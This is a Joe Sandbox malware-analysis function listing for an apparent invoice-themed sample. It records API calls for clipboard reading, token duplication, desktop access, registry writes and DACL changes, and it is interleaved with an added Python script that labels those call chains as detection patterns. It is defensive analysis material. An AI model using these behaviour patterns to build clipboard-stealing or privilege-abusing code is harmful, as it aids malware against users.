                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                    • String ID:
                    • API String ID: 941120096-0
                    • Opcode ID: 902e20bafed489eef60f1ca85f453e1c8c0b28279d1dd5cea91936b8559b0ca3
                    • Instruction ID: b5dc3ed942bb2065ff3e32cea066d7e9e5a714fc40ca34f6f8fb939c96886832
                    • Opcode Fuzzy Hash: 902e20bafed489eef60f1ca85f453e1c8c0b28279d1dd5cea91936b8559b0ca3
                    • Instruction Fuzzy Hash: DB519E75204209ABD310FF64DC86F7F77E8BB84B00F105529FA9AE21E1DB70D9099B62
                    APIs
                      • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                      • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                      • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                    • _memset.LIBCMT ref: 00ED889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ED88ED
                    • CloseHandle.KERNEL32(?), ref: 00ED88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ED8915
                    • GetProcessWindowStation.USER32 ref: 00ED892E
                    • SetProcessWindowStation.USER32(00000000), ref: 00ED8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ED8952
                      • Part of subcall function 00ED8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
                      • Part of subcall function 00ED8713: CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 9c758d2685a753b7be3c069c87c5f309360fc29061cfc6a597f4547de6995f72
                    • Instruction ID: 87f99a0d29c8ed8d2bf6b74c4e36bb569dcb0faa58535188a741f4b2ee82a304
                    • Opcode Fuzzy Hash: 9c758d2685a753b7be3c069c87c5f309360fc29061cfc6a597f4547de6995f72
                    • Instruction Fuzzy Hash: E4814171900209AFDF11DFA4DD45AEEBBB8FF04308F08515AF920BA261DB718E15DB60
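The API lists in the records above are the behavioural evidence a triager pulls out of a Joe Sandbox function listing: the clipboard read (OpenClipboard, then GetClipboardData with formats 0000000D and 00000001), the foreground-forcing sequence (AttachThreadInput plus keybd_event with virtual key 00000012, then SetForegroundWindow) and the token/desktop sequence (DuplicateTokenEx, OpenWindowStationW on winsta0, OpenDesktopW on default). The Python script below is an added example and is not part of the Joe Sandbox report or of its IDA plugin. It parses records in exactly the "APIs / • Name.MODULE(args), ref: ADDR / Similarity / • API ID:" layout printed above and labels the three call chains. The pattern names are this example's own labels, not Joe Sandbox signature names; SAMPLE is constructed from API lines copied from the records above; the constant values CF_TEXT = 1, CF_UNICODETEXT = 0xD and VK_MENU = 0x12 are the documented Win32 values and do not come from the report.

```python
"""Parse Joe Sandbox IDA-plugin function records and label known Win32 call chains.
Added example, not part of the Joe Sandbox report. SAMPLE is constructed from the
report's own API lines; the PATTERNS labels are this example's, not Joe Sandbox's."""
import re
from dataclasses import dataclass, field

# Documented Win32 constants the patterns key on (not taken from the report).
CF_TEXT, CF_UNICODETEXT = 0x1, 0xD   # GetClipboardData formats
VK_MENU = 0x12                        # Alt; a synthetic Alt press lets SetForegroundWindow succeed

# "• Name.MODULE(args), ref: ADDR"; args and ref are optional and a line may carry
# the "Part of subcall function XXXXXXXX:" prefix seen in the report.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list    # int for 8-digit hex literals, str for names, None for "?"
    ref: object   # call-site address as printed, or None

@dataclass
class Record:
    api_id: str = ""
    calls: list = field(default_factory=list)

def _parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_records(text):
    """Split the listing at each 'APIs' header and collect that record's calls and API ID."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"]))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
    return records

def _called(rec, name, arg0=None):
    """True if rec calls `name`; when arg0 is given, the first argument must be one of arg0."""
    return any(c.name == name and (arg0 is None or (c.args and c.args[0] in arg0))
               for c in rec.calls)

PATTERNS = {
    # clipboard text harvest: open the clipboard and fetch a text-format handle
    "clipboard_text_read": lambda r: _called(r, "OpenClipboard")
        and _called(r, "GetClipboardData", {CF_TEXT, CF_UNICODETEXT}),
    # foreground forcing: attach to the foreground thread, fake an Alt press, take focus
    "force_foreground_window": lambda r: _called(r, "AttachThreadInput")
        and _called(r, "keybd_event", {VK_MENU}) and _called(r, "SetForegroundWindow"),
    # token duplication followed by interactive window station / desktop access
    "token_and_desktop_access": lambda r: _called(r, "DuplicateTokenEx")
        and _called(r, "OpenWindowStationW", {"winsta0"}) and _called(r, "OpenDesktopW", {"default"}),
}

def classify(text):
    """Return {API ID: [labels]} for every record matching at least one pattern."""
    out = {}
    for rec in parse_records(text):
        hits = sorted(label for label, pred in PATTERNS.items() if pred(rec))
        if hits:
            out[rec.api_id] = hits
    return out

# Constructed from API lines in the report above; the Sleep record is a negative case.
SAMPLE = """\
APIs
• OpenClipboard.USER32(00F0F910), ref: 00EF4284
• GetClipboardData.USER32(0000000D), ref: 00EF429A
• CloseClipboard.USER32 ref: 00EF4447
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EBDA8E
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAE8
• keybd_event.USER32(00000012,00000000), ref: 00EBDB1B
• SetForegroundWindow.USER32(?), ref: 00EBDB4A
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
APIs
  • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ED88ED
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ED8915
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ED8952
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
APIs
• Sleep.KERNELBASE(000001F4), ref: 00E222B1
Similarity
• API ID: Sleep
"""

if __name__ == "__main__":
    for api_id, labels in classify(SAMPLE).items():
        print(labels, "<-", api_id)
```

To use it on a real report, pass the text of the whole function listing to classify() instead of SAMPLE; the parser keys only on the "APIs" header, the bullet API lines and the "API ID" line, so the Memory Dump Source and fuzzy-hash lines are ignored. Matching on the first argument is deliberate: GetClipboardData with a non-text format, or keybd_event with a key other than Alt, is not evidence of the behaviours labelled here.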
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EEC9F8
                    • FindClose.KERNEL32(00000000), ref: 00EECA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EECAAF
                    • __swprintf.LIBCMT ref: 00EECAFB
                    • __swprintf.LIBCMT ref: 00EECB3E
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • __swprintf.LIBCMT ref: 00EECB92
                      • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                    • __swprintf.LIBCMT ref: 00EECBE0
                      • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA3953
                      • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA396B
                    • __swprintf.LIBCMT ref: 00EECC2F
                    • __swprintf.LIBCMT ref: 00EECC7E
                    • __swprintf.LIBCMT ref: 00EECCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                    • Instruction ID: 5a4198adccaa6cd97799ed22ede643735c95b484818e36ab1aaedba7bbadb255
                    • Opcode Fuzzy Hash: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                    • Instruction Fuzzy Hash: 0FA15FB2508304ABC714FB64C985DAFB7ECFF94704F441929B58AE6192EB34DA09C762
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00EEF221
                    • _wcscmp.LIBCMT ref: 00EEF236
                    • _wcscmp.LIBCMT ref: 00EEF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 00EEF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 00EEF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF291
                    • FindClose.KERNEL32(00000000), ref: 00EEF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF2B8
                    • _wcscmp.LIBCMT ref: 00EEF2DF
                    • _wcscmp.LIBCMT ref: 00EEF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF308
                    • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF330
                    • FindClose.KERNEL32(00000000), ref: 00EEF33D
                    • FindClose.KERNEL32(00000000), ref: 00EEF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                    • Instruction ID: 8620b8b08cecb85b6ac0783c1c0ab7fedf78d9d477a69db8037cc0ef1158e1d5
                    • Opcode Fuzzy Hash: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                    • Instruction Fuzzy Hash: 8131E47660025D6ADF20DBB5DC48ADE73ACAF49364F141176F914F30A0EB30DA89DA50
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F0F910,00000000,?,00000000,?,?), ref: 00F00C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F00C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F00D1D
                    • RegCloseKey.ADVAPI32(?), ref: 00F0103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F0104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: f21121351ed11be05b3815e00924214f99e8b781f37e01a41f0ba0bdba47c3bf
                    • Instruction ID: 79474e1f3472d7ec7101a038b8b8c6f0edae2421f264be0a9a75d8ab44c81c9b
                    • Opcode Fuzzy Hash: f21121351ed11be05b3815e00924214f99e8b781f37e01a41f0ba0bdba47c3bf
                    • Instruction Fuzzy Hash: 970260756006119FCB14EF14C895E2AB7E5FF89724F04985DF98AAB3A2CB30ED41DB81
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • DragQueryPoint.SHELL32(?,?), ref: 00F0C917
                      • Part of subcall function 00F0ADF1: ClientToScreen.USER32(?,?), ref: 00F0AE1A
                      • Part of subcall function 00F0ADF1: GetWindowRect.USER32(?,?), ref: 00F0AE90
                      • Part of subcall function 00F0ADF1: PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0C980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F0C98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F0C9AE
                    • _wcscat.LIBCMT ref: 00F0C9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F0C9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0CA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA47
                    • DragFinish.SHELL32(?), ref: 00F0CA4E
                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F0CB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 2166380349-3440237614
                    • Opcode ID: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                    • Instruction ID: 6f5e36d71243332dfc8b052e1392a87e0342844e8d7fa0d1c10120c2d51a5046
                    • Opcode Fuzzy Hash: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                    • Instruction Fuzzy Hash: 1D616B71108305AFC711EF64CC85D9BBBE8FF89710F400A1EF599A21A1DB70DA49EB92
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00EEF37E
                    • _wcscmp.LIBCMT ref: 00EEF393
                    • _wcscmp.LIBCMT ref: 00EEF3AA
                      • Part of subcall function 00EE45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EE45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF3D9
                    • FindClose.KERNEL32(00000000), ref: 00EEF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF400
                    • _wcscmp.LIBCMT ref: 00EEF427
                    • _wcscmp.LIBCMT ref: 00EEF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF450
                    • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF478
                    • FindClose.KERNEL32(00000000), ref: 00EEF485
                    • FindClose.KERNEL32(00000000), ref: 00EEF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                    • Instruction ID: 02b5f8e9c95f980c31f8b448663fcd1db4df6cba1ea19161d456bd80dd9cf34c
                    • Opcode Fuzzy Hash: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                    • Instruction Fuzzy Hash: 8531B57250125D6ACB20AB75EC88ADF77ACAF49364F141175F850F30E1E730DA49DA54
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F0C4EC
                    • GetFocus.USER32 ref: 00F0C4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 00F0C507
                    • _memset.LIBCMT ref: 00F0C632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F0C65D
                    • GetMenuItemCount.USER32(?), ref: 00F0C67D
                    • GetMenuItemID.USER32(?,00000000), ref: 00F0C690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F0C6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F0C70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F0C744
                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F0C779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                    • String ID: 0
                    • API String ID: 3616455698-4108050209
                    • Opcode ID: 34bf7a0479c12ca81116887057281e0a0569f711aba504540320bbcaeceb0935
                    • Instruction ID: db70fa38e133de0bb1f2ba39c188ee14472b49c1244fe835872005b805ac4c44
                    • Opcode Fuzzy Hash: 34bf7a0479c12ca81116887057281e0a0569f711aba504540320bbcaeceb0935
                    • Instruction Fuzzy Hash: 42818C756083059FD720DF14C884A6BBBE8FB89324F04062DF99997291D771E905FBA2
                    APIs
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                      • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                      • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                      • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                      • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                      • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                      • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED825B
                    • _memset.LIBCMT ref: 00ED8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED828F
                    • GetLengthSid.ADVAPI32(?), ref: 00ED82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00ED82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED82F9
                    • GetLengthSid.ADVAPI32(?), ref: 00ED8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8325
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00ED832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED834D
                    • CopySid.ADVAPI32(00000000), ref: 00ED8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                    • Instruction ID: 9414c21bcd9fa2c9b6b5b96aa5e4b06dc1a48678a22cbeddd2bbb7c57143f78a
                    • Opcode Fuzzy Hash: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                    • Instruction Fuzzy Hash: 4B616971900209EFDF10DFA4DE84AEEBBB9FF04704F04912AF815A7291DB319A16DB60
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                    • API String ID: 0-3700951917
                    • Opcode ID: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
